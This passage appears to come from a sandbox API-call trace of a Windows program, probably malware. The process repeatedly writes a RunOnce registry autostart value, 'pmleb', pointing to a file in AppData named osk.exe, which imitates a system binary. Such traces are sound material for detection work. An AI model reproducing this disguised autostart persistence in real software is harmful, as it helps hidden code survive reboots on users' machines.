out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.945] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.945] RegCloseKey (hKey=0x280) returned 0x0 [0096.946] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.946] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.946] SetTimer (hWnd=0x20280, nIDEvent=0x22b9, uElapse=0xa, lpTimerFunc=0x0) returned 0x22b9 [0096.946] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.959] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.959] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.960] KillTimer (hWnd=0x20280, uIDEvent=0x22b9) returned 1 [0096.960] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.960] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.960] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.961] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.961] RegCloseKey (hKey=0x280) returned 0x0 [0096.961] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.961] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.961] SetTimer (hWnd=0x20280, nIDEvent=0x22ba, uElapse=0xa, lpTimerFunc=0x0) returned 0x22ba [0096.961] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.975] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.975] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.975] KillTimer (hWnd=0x20280, uIDEvent=0x22ba) returned 1 [0096.976] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.976] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.976] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.976] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.977] RegCloseKey (hKey=0x280) returned 0x0 [0096.977] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.977] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.977] SetTimer (hWnd=0x20280, nIDEvent=0x22bb, uElapse=0xa, lpTimerFunc=0x0) returned 0x22bb [0096.977] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.991] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.991] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.991] KillTimer (hWnd=0x20280, uIDEvent=0x22bb) returned 1 [0096.992] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.992] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.992] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.992] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.992] RegCloseKey (hKey=0x280) returned 0x0 [0096.992] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.992] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.993] SetTimer (hWnd=0x20280, nIDEvent=0x22bc, uElapse=0xa, lpTimerFunc=0x0) returned 0x22bc [0096.993] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0097.006] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0097.006] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0097.006] KillTimer (hWnd=0x20280, uIDEvent=0x22bc) returned 1 [0097.007] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.007] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0097.007] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0097.007] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0097.007] RegCloseKey (hKey=0x280) returned 0x0 [0097.008] IUnknown:Release (This=0x7a9740) returned 0x1 [0097.008] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.008] SetTimer (hWnd=0x20280, nIDEvent=0x22bd, uElapse=0xa, lpTimerFunc=0x0) returned 0x22bd [0097.008] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0097.024] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0097.024] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0097.024] KillTimer (hWnd=0x20280, uIDEvent=0x22bd) returned 1 [0097.024] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.025] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0097.025] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0097.025] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0097.025] RegCloseKey (hKey=0x280) returned 0x0 [0097.025] IUnknown:Release (This=0x7a9740) returned 0x1 [0097.025] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.025] SetTimer (hWnd=0x20280, nIDEvent=0x22be, uElapse=0xa, lpTimerFunc=0x0) returned 0x22be [0097.025] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0097.038] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0097.038] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0097.038] KillTimer (hWnd=0x20280, uIDEvent=0x22be) returned 1 [0097.038] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.039] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0097.039] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0097.039] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0097.039] RegCloseKey (hKey=0x280) returned 0x0 [0097.039] IUnknown:Release (This=0x7a9740) returned 0x1 [0097.039] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.039] SetTimer (hWnd=0x20280, nIDEvent=0x22bf, uElapse=0xa, lpTimerFunc=0x0) returned 0x22bf [0097.039] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0097.053] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0097.053] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0097.053] KillTimer (hWnd=0x20280, uIDEvent=0x22bf) returned 1 [0097.054] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.054] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0097.054] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0097.054] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0097.054] RegCloseKey (hKey=0x280) returned 0x0 [0097.055] IUnknown:Release (This=0x7a9740) returned 0x1 [0097.055] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.055] SetTimer (hWnd=0x20280, nIDEvent=0x22c0, uElapse=0xa, lpTimerFunc=0x0) returned 0x22c0 [0097.055] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0097.813] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0097.813] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0097.813] KillTimer (hWnd=0x20280, uIDEvent=0x22c0) returned 1 [0097.813] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.814] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0097.814] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0097.814] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0097.814] RegCloseKey (hKey=0x280) returned 0x0 [0097.814] IUnknown:Release (This=0x7a9740) returned 0x1 [0097.814] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.814] SetTimer (hWnd=0x20280, nIDEvent=0x22c1, uElapse=0xa, lpTimerFunc=0x0) returned 0x22c1 [0097.815] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0097.922] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0097.922] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0097.923] KillTimer (hWnd=0x20280, uIDEvent=0x22c1) returned 1 [0097.923] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.923] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0097.923] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0097.924] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0097.924] RegCloseKey (hKey=0x280) returned 0x0 [0097.924] IUnknown:Release (This=0x7a9740) returned 0x1 [0097.924] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.924] SetTimer (hWnd=0x20280, nIDEvent=0x22c2, uElapse=0xa, lpTimerFunc=0x0) returned 0x22c2 [0097.924] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0097.927] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0097.927] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0097.927] KillTimer (hWnd=0x20280, uIDEvent=0x22c2) returned 1 [0097.928] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.928] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0097.928] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0097.928] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0097.928] RegCloseKey (hKey=0x280) returned 0x0 [0097.928] IUnknown:Release (This=0x7a9740) returned 0x1 [0097.928] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.928] SetTimer (hWnd=0x20280, nIDEvent=0x22c3, uElapse=0xa, lpTimerFunc=0x0) returned 0x22c3 [0097.929] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0097.943] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0097.943] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0097.944] KillTimer (hWnd=0x20280, uIDEvent=0x22c3) returned 1 [0097.944] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.944] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0097.944] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0097.944] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0097.945] RegCloseKey (hKey=0x280) returned 0x0 [0097.945] IUnknown:Release (This=0x7a9740) returned 0x1 [0097.945] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.945] SetTimer (hWnd=0x20280, nIDEvent=0x22c4, uElapse=0xa, lpTimerFunc=0x0) returned 0x22c4 [0097.945] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0097.958] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0097.958] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0097.958] KillTimer (hWnd=0x20280, uIDEvent=0x22c4) returned 1 [0097.958] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.958] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0097.959] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0097.959] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0097.959] RegCloseKey (hKey=0x280) returned 0x0 [0097.959] IUnknown:Release (This=0x7a9740) returned 0x1 [0097.959] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.959] SetTimer (hWnd=0x20280, nIDEvent=0x22c5, uElapse=0xa, lpTimerFunc=0x0) returned 0x22c5 [0097.959] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0097.973] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0097.973] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0097.974] KillTimer (hWnd=0x20280, uIDEvent=0x22c5) returned 1 [0097.974] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.974] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0097.974] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0097.975] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0097.975] RegCloseKey (hKey=0x280) returned 0x0 [0097.975] IUnknown:Release (This=0x7a9740) returned 0x1 [0097.975] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.975] SetTimer (hWnd=0x20280, nIDEvent=0x22c6, uElapse=0xa, lpTimerFunc=0x0) returned 0x22c6 [0097.975] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0097.989] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0097.989] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0097.989] KillTimer (hWnd=0x20280, uIDEvent=0x22c6) returned 1 [0097.990] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.990] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0097.990] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0097.990] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0097.991] RegCloseKey (hKey=0x280) returned 0x0 [0097.991] IUnknown:Release (This=0x7a9740) returned 0x1 [0097.991] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0097.991] SetTimer (hWnd=0x20280, nIDEvent=0x22c7, uElapse=0xa, lpTimerFunc=0x0) returned 0x22c7 [0097.991] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.005] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.005] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.005] KillTimer (hWnd=0x20280, uIDEvent=0x22c7) returned 1 [0098.005] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.006] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.006] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.006] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.006] RegCloseKey (hKey=0x280) returned 0x0 [0098.006] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.006] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.006] SetTimer (hWnd=0x20280, nIDEvent=0x22c8, uElapse=0xa, lpTimerFunc=0x0) returned 0x22c8 [0098.006] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.020] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.020] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.020] KillTimer (hWnd=0x20280, uIDEvent=0x22c8) returned 1 [0098.021] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.021] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.021] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.021] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.021] RegCloseKey (hKey=0x280) returned 0x0 [0098.022] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.022] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.022] SetTimer (hWnd=0x20280, nIDEvent=0x22c9, uElapse=0xa, lpTimerFunc=0x0) returned 0x22c9 [0098.022] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.036] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.036] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.036] KillTimer (hWnd=0x20280, uIDEvent=0x22c9) returned 1 [0098.036] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.037] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.037] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.037] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.038] RegCloseKey (hKey=0x280) returned 0x0 [0098.038] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.038] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.038] SetTimer (hWnd=0x20280, nIDEvent=0x22ca, uElapse=0xa, lpTimerFunc=0x0) returned 0x22ca [0098.038] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.051] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.051] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.052] KillTimer (hWnd=0x20280, uIDEvent=0x22ca) returned 1 [0098.052] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.052] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.052] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.052] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.053] RegCloseKey (hKey=0x280) returned 0x0 [0098.053] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.053] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.053] SetTimer (hWnd=0x20280, nIDEvent=0x22cb, uElapse=0xa, lpTimerFunc=0x0) returned 0x22cb [0098.053] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, 